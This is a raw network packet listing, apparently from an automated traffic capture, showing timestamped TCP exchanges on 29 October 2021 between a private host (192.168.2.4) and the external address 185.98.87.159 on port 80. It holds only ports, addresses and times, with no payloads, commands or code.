Oct 29, 2021 20:50:07.715882063 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.715912104 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.715949059 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.715965986 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.715981007 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.715997934 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.716001987 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.716023922 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.716039896 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.716042042 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.716059923 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.716075897 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.716075897 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.716104984 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.716109037 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.716123104 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.716154099 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.716171980 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.716188908 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.716219902 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.716257095 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.716274023 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.716290951 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.716305971 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.716306925 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.716325998 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.716341972 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.716341972 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.716357946 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.716373920 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.716373920 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.716392040 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.716408014 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.716408968 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.716427088 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.716439009 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.716443062 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.716459990 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.716475964 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.716478109 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.716506004 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.716515064 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.716531992 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.716550112 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.716561079 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.716566086 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.716583014 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.716595888 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.716598988 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.716631889 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.716643095 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.716682911 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.716698885 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.716716051 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.716717005 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.716753960 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.716799021 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.716814995 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.716831923 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.716845036 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.716862917 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.716893911 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.768057108 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.768098116 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.768121004 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.768142939 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.768152952 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.768167019 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.768186092 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.768192053 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.768214941 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.768234968 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.768254042 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.768259048 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.768280029 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.768287897 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.768305063 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.768312931 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.768327951 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.768352032 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.768357038 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.768377066 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.768399954 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.768410921 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.768424988 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.768448114 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.768457890 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.768466949 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.768491030 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.768501043 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.768510103 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.768533945 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.768541098 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.768554926 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.768589973 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.768618107 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.768641949 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.768662930 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.768687010 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.768690109 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.768707991 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.768722057 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.768734932 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.768759012 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.768778086 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.768781900 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.768817902 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.769099951 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.769125938 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.769150019 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.769165039 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.769171953 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.769197941 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.769222975 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.769272089 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.769294977 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.769315958 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.769318104 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.769342899 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.769356012 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.769364119 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.769387007 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.769396067 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.769408941 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.769449949 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.769610882 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.769638062 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.769660950 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.769671917 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.769682884 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.769718885 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.769722939 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.769745111 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.769778967 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.820933104 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.820960045 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.821048021 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.821062088 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.821065903 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.821083069 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.821101904 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.821113110 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.821119070 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.821146011 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.821172953 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.821190119 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.821206093 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.821225882 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.821235895 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.821261883 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.821481943 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.821531057 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.821537971 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.821557045 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.821599007 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.821599960 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.821624041 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.821674109 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.821727991 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.821746111 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.821762085 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.821779013 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.821790934 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.821815968 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.821825027 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.821832895 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.821847916 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.821908951 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.821932077 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.821949959 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.821995020 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.822031021 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.822047949 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.822063923 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.822082043 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.822093010 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.822098017 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.822117090 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.822127104 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.822139025 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.822155952 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.822160959 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.822196960 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.822217941 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.822235107 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.822249889 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.822266102 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.822276115 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.822283030 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.822300911 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.822309017 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.822316885 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.822334051 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.822343111 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.822350025 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.822365999 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.822376013 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.822384119 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.822400093 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.822408915 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.822416067 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.822432995 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.822441101 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.822449923 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.822465897 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.822474957 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.822510004 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.873308897 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.873353958 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.873480082 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.873531103 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.873560905 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.873589039 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.873608112 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.873616934 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.873648882 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.873667002 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.873678923 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.873711109 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.873728037 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.873739004 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.873769045 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.873783112 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.873799086 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.873828888 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.873857975 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.873862982 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.873888016 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.873900890 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.873919010 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.873950005 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.873960018 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.873980999 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.874010086 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.874027014 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.874038935 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.874064922 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.874080896 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.874093056 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.874124050 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.874136925 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.874154091 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.874197960 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.874234915 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.874267101 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.874295950 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.874308109 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.874326944 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.874355078 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.874373913 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.874383926 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.874425888 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.874459982 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.874491930 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.874521971 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.874535084 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.874552011 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.874582052 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.874599934 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.874609947 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.874638081 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.874653101 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.874670029 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.874722004 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.875056982 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.875091076 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.875123024 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.875145912 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.875154018 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.875185013 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.875200987 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.875216007 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.875245094 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.875257969 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.875274897 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:07.875318050 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.890635014 CEST	49831	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:07.947416067 CEST	80	49831	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.101627111 CEST	49838	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.155215025 CEST	80	49838	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.155534983 CEST	49838	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.164185047 CEST	49838	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.164244890 CEST	49838	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.242965937 CEST	80	49838	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.243257999 CEST	49838	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.246692896 CEST	49838	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.300265074 CEST	80	49838	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.433042049 CEST	49839	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.485210896 CEST	80	49839	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.486530066 CEST	49839	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.486630917 CEST	49839	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.486733913 CEST	49839	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.566930056 CEST	80	49839	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.567246914 CEST	49839	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.567274094 CEST	49839	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.599189043 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.619127035 CEST	80	49839	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.650402069 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.650510073 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.650676966 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.742408991 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.791618109 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.791659117 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.791682959 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.791707039 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.791724920 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.791733980 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.791755915 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.791764975 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.791776896 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.791798115 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.791802883 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.791819096 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.791826963 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.791840076 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.791918039 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.843055010 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.843095064 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.843116999 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.843141079 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.843164921 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.843187094 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.843199015 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.843215942 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.843230963 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.843240023 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.843245029 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.843262911 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.843286037 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.843288898 CEST	49840	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:10.843307972 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.843329906 CEST	80	49840	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:10.843338013 CEST	49840	80	192.168.2.4	185.98.87.159
